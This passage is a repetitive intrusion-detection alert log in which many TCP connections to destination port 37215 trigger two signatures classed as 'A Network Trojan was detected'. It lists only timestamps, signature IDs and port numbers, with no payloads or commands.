            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709552
            SID:2829579
            Source Port:45380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.930103
            SID:2829579
            Source Port:49772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.347036
            SID:2829579
            Source Port:41240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930186
            SID:2829579
            Source Port:41680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.432597
            SID:2829579
            Source Port:56784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.658225
            SID:2835222
            Source Port:51158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734921
            SID:2835222
            Source Port:33648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378334
            SID:2829579
            Source Port:45826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436488
            SID:2829579
            Source Port:45734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039655
            SID:2829579
            Source Port:60698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065551
            SID:2829579
            Source Port:34972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377139
            SID:2829579
            Source Port:54294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.849647
            SID:2835222
            Source Port:57758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.711119
            SID:2835222
            Source Port:52984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.579227
            SID:2829579
            Source Port:33100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001420
            SID:2835222
            Source Port:34178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723897
            SID:2829579
            Source Port:35944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.725296
            SID:2835222
            Source Port:33008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.169940
            SID:2829579
            Source Port:37030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.741565
            SID:2835222
            Source Port:48758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811029
            SID:2829579
            Source Port:55086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.048229
            SID:2829579
            Source Port:36958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065194
            SID:2829579
            Source Port:50646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505753
            SID:2835222
            Source Port:49964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.792488
            SID:2829579
            Source Port:45864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.004689
            SID:2829579
            Source Port:54366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775529
            SID:2829579
            Source Port:37576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.185170
            SID:2829579
            Source Port:55126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.808387
            SID:2835222
            Source Port:43186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.634281
            SID:2835222
            Source Port:58128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.858413
            SID:2835222
            Source Port:46888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276489
            SID:2835222
            Source Port:59060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.540066
            SID:2829579
            Source Port:49800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870193
            SID:2835222
            Source Port:52022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911217
            SID:2829579
            Source Port:35204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952763
            SID:2835222
            Source Port:50892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968041
            SID:2829579
            Source Port:59988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.524082
            SID:2829579
            Source Port:41708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506954
            SID:2829579
            Source Port:60876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837589
            SID:2829579
            Source Port:56192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952540
            SID:2829579
            Source Port:46416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039817
            SID:2835222
            Source Port:51966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.860184
            SID:2829579
            Source Port:49114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543268
            SID:2835222
            Source Port:54640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.940785
            SID:2829579
            Source Port:60222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421381
            SID:2835222
            Source Port:43212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060886
            SID:2835222
            Source Port:54756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744383
            SID:2835222
            Source Port:45674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.761229
            SID:2835222
            Source Port:48530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880174
            SID:2829579
            Source Port:38496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861714
            SID:2829579
            Source Port:38272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.294620
            SID:2835222
            Source Port:44902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.873235
            SID:2835222
            Source Port:40760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.282833
            SID:2829579
            Source Port:58540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.276175
            SID:2835222
            Source Port:44032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.771101
            SID:2829579
            Source Port:49578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.078553
            SID:2835222
            Source Port:43632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505830
            SID:2829579
            Source Port:43338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058858
            SID:2829579
            Source Port:56012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855341
            SID:2835222
            Source Port:33166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371384
            SID:2835222
            Source Port:39102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.019069
            SID:2835222
            Source Port:36584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.920140
            SID:2829579
            Source Port:37932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.572080
            SID:2829579
            Source Port:38072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988562
            SID:2829579
            Source Port:59852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291517
            SID:2835222
            Source Port:45216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.771701
            SID:2835222
            Source Port:38638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.030986
            SID:2835222
            Source Port:45834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.314377
            SID:2835222
            Source Port:48266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.645872
            SID:2829579
            Source Port:43852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742259
            SID:2835222
            Source Port:34170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260413
            SID:2835222
            Source Port:60524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.380488
            SID:2829579
            Source Port:45836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826032
            SID:2835222
            Source Port:41764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.908556
            SID:2835222
            Source Port:58670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808105
            SID:2835222
            Source Port:40496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929009
            SID:2829579
            Source Port:55660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563959
            SID:2835222
            Source Port:36092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.784052
            SID:2835222
            Source Port:33384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945250
            SID:2835222
            Source Port:35808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989578
            SID:2835222
            Source Port:56286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.368880
            SID:2835222
            Source Port:46510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424006
            SID:2835222
            Source Port:50396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903157
            SID:2829579
            Source Port:56828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881120
            SID:2835222
            Source Port:35334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459675
            SID:2835222
            Source Port:56834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.079427
            SID:2829579
            Source Port:53234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582346
            SID:2829579
            Source Port:44446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.735267
            SID:2829579
            Source Port:54364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.573705
            SID:2829579
            Source Port:33768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.068541
            SID:2829579
            Source Port:56630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039872
            SID:2835222
            Source Port:56610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853597
            SID:2829579
            Source Port:60818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809996
            SID:2829579
            Source Port:55906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714505
            SID:2835222
            Source Port:51548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.803794
            SID:2829579
            Source Port:36540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742776
            SID:2835222
            Source Port:58416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945907
            SID:2835222
            Source Port:58664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.477452
            SID:2835222
            Source Port:51656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779103
            SID:2835222
            Source Port:36374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850642
            SID:2829579
            Source Port:60670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061492
            SID:2835222
            Source Port:38182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714631
            SID:2829579
            Source Port:37882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922294
            SID:2835222
            Source Port:55540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911278
            SID:2835222
            Source Port:60772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.634368
            SID:2829579
            Source Port:44028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061277
            SID:2835222
            Source Port:55038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605723
            SID:2829579
            Source Port:36848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778995
            SID:2835222
            Source Port:54590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969382
            SID:2835222
            Source Port:49638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.854896
            SID:2829579
            Source Port:33118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261274
            SID:2835222
            Source Port:38666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.618160
            SID:2835222
            Source Port:35828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996087
            SID:2835222
            Source Port:49058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052788
            SID:2835222
            Source Port:42634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067283
            SID:2835222
            Source Port:54298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734458
            SID:2829579
            Source Port:47762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863023
            SID:2829579
            Source Port:37926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.042571
            SID:2829579
            Source Port:37994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910195
            SID:2835222
            Source Port:35366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927305
            SID:2829579
            Source Port:45926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849414
            SID:2835222
            Source Port:42768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733310
            SID:2829579
            Source Port:44964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966909
            SID:2835222
            Source Port:35996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712963
            SID:2835222
            Source Port:44052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834003
            SID:2835222
            Source Port:52908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.798299
            SID:2829579
            Source Port:57212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863868
            SID:2835222
            Source Port:43944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754903
            SID:2829579
            Source Port:41986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821737
            SID:2829579
            Source Port:47706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.581998
            SID:2835222
            Source Port:33010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998890
            SID:2829579
            Source Port:42584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.540106
            SID:2829579
            Source Port:51524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828170
            SID:2829579
            Source Port:37060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326824
            SID:2829579
            Source Port:58148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.753859
            SID:2835222
            Source Port:56740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773779
            SID:2829579
            Source Port:38224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870209
            SID:2829579
            Source Port:59370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.767709
            SID:2829579
            Source Port:56326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.942448
            SID:2835222
            Source Port:39240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450559
            SID:2835222
            Source Port:36292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881980
            SID:2829579
            Source Port:55368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979401
            SID:2835222
            Source Port:53252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862890
            SID:2829579
            Source Port:51812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996212
            SID:2835222
            Source Port:37396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610451
            SID:2835222
            Source Port:38962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.635167
            SID:2835222
            Source Port:51498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945079
            SID:2829579
            Source Port:58384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.071929
            SID:2829579
            Source Port:51948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826220
            SID:2829579
            Source Port:59206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.759976
            SID:2829579
            Source Port:43404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.834913
            SID:2835222
            Source Port:51872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.565520
            SID:2829579
            Source Port:57336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999516
            SID:2829579
            Source Port:53460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.863684
            SID:2835222
            Source Port:47486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930035
            SID:2829579
            Source Port:57732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552838
            SID:2829579
            Source Port:34976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.864204
            SID:2835222
            Source Port:58002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.617964
            SID:2829579
            Source Port:34136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.998432
            SID:2835222
            Source Port:59978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.824266
            SID:2835222
            Source Port:40608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741288
            SID:2829579
            Source Port:57714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.615224
            SID:2835222
            Source Port:56498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.803957
            SID:2829579
            Source Port:45578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.494173
            SID:2829579
            Source Port:42816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.719407
            SID:2835222
            Source Port:53098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.655563
            SID:2829579
            Source Port:33270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847741
            SID:2835222
            Source Port:37288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251376
            SID:2835222
            Source Port:36040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.646683
            SID:2835222
            Source Port:44546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.442042
            SID:2835222
            Source Port:58706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754715
            SID:2835222
            Source Port:49404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741882
            SID:2835222
            Source Port:50974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525710
            SID:2829579
            Source Port:44680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770902
            SID:2829579
            Source Port:52724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713419
            SID:2835222
            Source Port:60798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047484
            SID:2835222
            Source Port:49170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860473
            SID:2829579
            Source Port:47302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941745
            SID:2829579
            Source Port:51316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350057
            SID:2829579
            Source Port:53460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559369
            SID:2829579
            Source Port:59254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.788995
            SID:2829579
            Source Port:53772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.741979
            SID:2829579
            Source Port:42566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963161
            SID:2829579
            Source Port:35408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.565453
            SID:2835222
            Source Port:59106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754459
            SID:2835222
            Source Port:57746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.018682
            SID:2835222
            Source Port:35150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056022
            SID:2835222
            Source Port:60326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.050870
            SID:2835222
            Source Port:50988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857645
            SID:2829579
            Source Port:60572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.762315
            SID:2835222
            Source Port:47012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.053868
            SID:2835222
            Source Port:50816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857747
            SID:2829579
            Source Port:36656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.849719
            SID:2835222
            Source Port:41288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.866721
            SID:2829579
            Source Port:46044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435436
            SID:2835222
            Source Port:37282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.363723
            SID:2835222
            Source Port:36158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
